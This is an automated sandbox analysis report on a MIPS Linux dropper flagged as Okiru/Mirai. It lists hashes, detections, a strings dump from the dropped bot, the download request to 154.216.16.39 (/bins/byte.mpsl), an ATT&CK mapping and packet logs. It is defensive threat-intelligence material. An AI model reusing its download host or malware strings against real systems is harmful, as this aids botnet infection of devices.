Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.mpsl.elf

Overview

General Information

Sample name:dlr.mpsl.elf
Analysis ID:1546729
MD5:bc7c970f3f8e1211a12c141741274031
SHA1:6f733a53c545badf3337422f95a974cfc56f5176
SHA256:d3f39b50f80370ecaa0355e2b6aa7f5bcc306a88180504f675fbd683e59864b8
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Okiru
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1546729
Start date and time:2024-11-01 14:57:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.mpsl.elf
Detection:MAL
Classification:mal64.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.mpsl.elf
Command:/tmp/dlr.mpsl.elf
PID:6239
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • dlr.mpsl.elf (PID: 6239, Parent: 6163, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/dlr.mpsl.elf
  • cleanup
SourceRuleDescriptionAuthorStrings
/tmp/byteJoeSecurity_OkiruYara detected OkiruJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: /tmp/byteAvira: detection malicious, Label: EXP/ELF.Mirai.Bootnet.o
    Source: dlr.mpsl.elfReversingLabs: Detection: 39%
    Source: byte.12.drString: 'byte/proc/%d/net/tcp %*d: %*x:%x/proc//proc/%s/exe/proc/self/exe/proc/proc/%d/cmdlinenetstatwgettftpftpcurlbusybox/bin/busyboxvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinTacoBellGodYololigangExecutionorbitclientAmnes
    Source: global trafficHTTP traffic detected: GET /bins/byte.mpsl HTTP/1.0Data Raw: 00 00 Data Ascii:
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: global trafficHTTP traffic detected: GET /bins/byte.mpsl HTTP/1.0Data Raw: 00 00 Data Ascii:
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal64.troj.linELF@0/1@0/0
    Source: /tmp/dlr.mpsl.elf (PID: 6239)File written: /tmp/byteJump to dropped file
    Source: /tmp/dlr.mpsl.elf (PID: 6239)Queries kernel information via 'uname': Jump to behavior
    Source: dlr.mpsl.elf, 6239.1.00007ffde5d18000.00007ffde5d39000.rw-.sdmpBinary or memory string: 0x86_64/usr/bin/qemu-mipsel/tmp/dlr.mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.mpsl.elf
    Source: dlr.mpsl.elf, 6239.1.000056138c44f000.000056138c4d6000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
    Source: dlr.mpsl.elf, 6239.1.000056138c44f000.000056138c4d6000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mipsel
    Source: dlr.mpsl.elf, 6239.1.00007ffde5d18000.00007ffde5d39000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/byte, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/byte, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path InterceptionDirect Volume AccessOS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    SourceDetectionScannerLabelLink
    dlr.mpsl.elf39%ReversingLabsLinux.Backdoor.Mirai
    SourceDetectionScannerLabelLink
    /tmp/byte100%AviraEXP/ELF.Mirai.Bootnet.o
    /tmp/byte67%ReversingLabsLinux.Trojan.Mirai
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    109.202.202.202
    unknownSwitzerland
    13030INIT7CHfalse
    154.216.16.39
    unknownSeychelles
    135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
    91.189.91.43
    unknownUnited Kingdom
    41231CANONICAL-ASGBfalse
    91.189.91.42
    unknownUnited Kingdom
    41231CANONICAL-ASGBfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
    91.189.91.43.i.elfGet hashmaliciousUnknownBrowse
      harm5.elfGet hashmaliciousUnknownBrowse
        boatnet.spc.elfGet hashmaliciousMiraiBrowse
          boatnet.mips.elfGet hashmaliciousMiraiBrowse
            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
              boatnet.x86.elfGet hashmaliciousMiraiBrowse
                boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                    harm5.elfGet hashmaliciousMiraiBrowse
                      linux_ppc64.elfGet hashmaliciousChaosBrowse
                        91.189.91.42.i.elfGet hashmaliciousUnknownBrowse
                          harm5.elfGet hashmaliciousUnknownBrowse
                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                              boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                  boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                      boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                        harm5.elfGet hashmaliciousMiraiBrowse
                                          linux_ppc64.elfGet hashmaliciousChaosBrowse
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CANONICAL-ASGB.i.elfGet hashmaliciousUnknownBrowse
                                            • 91.189.91.42
                                            harm5.elfGet hashmaliciousUnknownBrowse
                                            • 91.189.91.42
                                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            harm5.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            linux_ppc64.elfGet hashmaliciousChaosBrowse
                                            • 91.189.91.42
                                            CANONICAL-ASGB.i.elfGet hashmaliciousUnknownBrowse
                                            • 91.189.91.42
                                            harm5.elfGet hashmaliciousUnknownBrowse
                                            • 91.189.91.42
                                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            harm5.elfGet hashmaliciousMiraiBrowse
                                            • 91.189.91.42
                                            linux_ppc64.elfGet hashmaliciousChaosBrowse
                                            • 91.189.91.42
                                            SKHT-ASShenzhenKatherineHengTechnologyInformationCofile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                            • 154.216.17.34
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                            • 154.216.17.34
                                            x86.elfGet hashmaliciousMiraiBrowse
                                            • 156.241.11.55
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 156.230.19.169
                                            zmap.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 154.216.20.164
                                            arm5.elfGet hashmaliciousUnknownBrowse
                                            • 154.216.20.58
                                            jew.spc.elfGet hashmaliciousMiraiBrowse
                                            • 156.254.70.156
                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 156.241.11.59
                                            mips.elfGet hashmaliciousUnknownBrowse
                                            • 154.216.20.58
                                            parm.elfGet hashmaliciousMiraiBrowse
                                            • 156.230.19.184
                                            INIT7CH.i.elfGet hashmaliciousUnknownBrowse
                                            • 109.202.202.202
                                            harm5.elfGet hashmaliciousUnknownBrowse
                                            • 109.202.202.202
                                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                            • 109.202.202.202
                                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                            • 109.202.202.202
                                            boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                            • 109.202.202.202
                                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                            • 109.202.202.202
                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 109.202.202.202
                                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 109.202.202.202
                                            harm5.elfGet hashmaliciousMiraiBrowse
                                            • 109.202.202.202
                                            linux_ppc64.elfGet hashmaliciousChaosBrowse
                                            • 109.202.202.202
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            /tmp/bytedlr.mpsl.elfGet hashmaliciousOkiruBrowse
                                              Process:/tmp/dlr.mpsl.elf
                                              File Type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                              Category:dropped
                                              Size (bytes):101700
                                              Entropy (8bit):5.618684036090976
                                              Encrypted:false
                                              SSDEEP:1536:PP+mE2skxZfOoCk5Yg6PbssqF0//o5/Qhptsl61d6q:PWmL2xDsb86Ys47
                                              MD5:85005D41FBE2AF79BDCB879BF576CDD0
                                              SHA1:9550CF3E0AF79AAA42D7569241C04C125F743A55
                                              SHA-256:A4414F00A4B4028851B6D838BAC84EDC0514B90D0ACF2D373F8546CCBB0067BC
                                              SHA-512:FB2C3E6AC40DBA38351C71DB0B94EF8725A1F33211F64A4FC678A4FD2410B400E22E1C777CE0794231FE163C9AADD7E3D9FCA8F95DCC512FB94B6D2ED73D6BCE
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 67%
                                              Joe Sandbox View:
                                              • Filename: dlr.mpsl.elf, Detection: malicious, Browse
                                              Reputation:low
                                              Preview:.ELF....................`.@.4...........4. ...(...............@...@..y...y...............y...yE..yE......3..........Q.td...............................<l..'!......'.......................<H..'!...$.........9'.. ........................<...'!... ........N9'.. ......................... ..'...<...'!......' ........................".......@..............y........Y....... ...B$.. ..y...y........Y....... ...B$4.........@....$ ...4......... ..y.$.......$.". ...............(..'...<$..'!......'........ ................y.$..@...$.. ......................y........@..y.$.. ........... . ..'............ ..'....!..............<...'!...!...x..........'...$$.....'.................................. ............................0.......0..........F....$....!@....b.......F...c$...%....!(`.....!...........!......<...'!......'0...,...(...$... ...................!...!......0...0H..... ....$......P.......@.....0...,...(...$... ...............8..'.......... ...........P.......@............. .! @.........
                                              File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):4.712007485845633
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:dlr.mpsl.elf
                                              File size:2'032 bytes
                                              MD5:bc7c970f3f8e1211a12c141741274031
                                              SHA1:6f733a53c545badf3337422f95a974cfc56f5176
                                              SHA256:d3f39b50f80370ecaa0355e2b6aa7f5bcc306a88180504f675fbd683e59864b8
                                              SHA512:2781eadff3ffdd9b76998e1cab29a7f7cbc441e9e3b6b6611567d25e30f436bda0fa168216a22cb9905a74d2fa01a32935a743b635f97205c9dbf7dc63b6972c
                                              SSDEEP:48:APQ27nuDW3B6df9ce+SMTLWPkeTDjFeXp:APQ2nuqYf9cjSoLW7TDM5
                                              TLSH:0F41F2191F901F23DDA6CC36465A2B963ACC802B616A23925274DD64BD2E605E7D38A8
                                              File Content Preview:.ELF......................@.4...........4. ...(...............@...@.L...L...............P...P.D.P.D.T...p...........Q.td...........................................0.,...&..% .....0...0% ...2..%0...".....0.......0.....6..%.C.%0......%.F....<T..'!...\...!(.

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:MIPS R3000
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x4004e4
                                              Flags:0x1007
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:1752
                                              Section Header Size:40
                                              Number of Section Headers:7
                                              Header String Table Index:6
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .textPROGBITS0x4000a00xa00x5600x00x6AX0016
                                              .rodataPROGBITS0x4006000x6000x4c0x10x32AMS004
                                              .gotPROGBITS0x4406500x6500x540x40x10000003WAp0016
                                              .bssNOBITS0x4406b00x6a40x100x00x3WA0016
                                              .mdebug.abi32PROGBITS0x480x6a40x00x00x0001
                                              .shstrtabSTRTAB0x00x6a40x310x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x4000000x4000000x64c0x64c5.01950x5R E0x10000.text .rodata
                                              LOAD0x6500x4406500x4406500x540x702.63630x6RW 0x10000.got .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 1, 2024 14:57:54.812370062 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:54.817421913 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:54.817480087 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:54.818509102 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:54.823368073 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.589330912 CET43928443192.168.2.2391.189.91.42
                                              Nov 1, 2024 14:57:55.697272062 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697294950 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697309017 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697321892 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697336912 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697351933 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697366953 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697380066 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697410107 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697592020 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697606087 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.697655916 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.697655916 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.702238083 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.702275991 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.702287912 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.702327013 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.833816051 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.833863974 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.833889961 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.833900928 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.833915949 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.833942890 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.833942890 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.833954096 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.838618040 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.838633060 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.838651896 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.838675976 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.839390993 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.843930960 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.843945980 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.843959093 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.844244957 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.844259977 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.844536066 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.848704100 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.848717928 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.848732948 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.848797083 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.849663019 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.849678040 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.850506067 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.854443073 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.854455948 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.854501009 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.854525089 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.854773045 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.859169006 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.859184027 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.860049963 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.971091032 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971113920 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971127987 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971196890 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971209049 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971223116 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971236944 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971761942 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971775055 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971788883 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.971863985 CET4542680192.168.2.23154.216.16.39
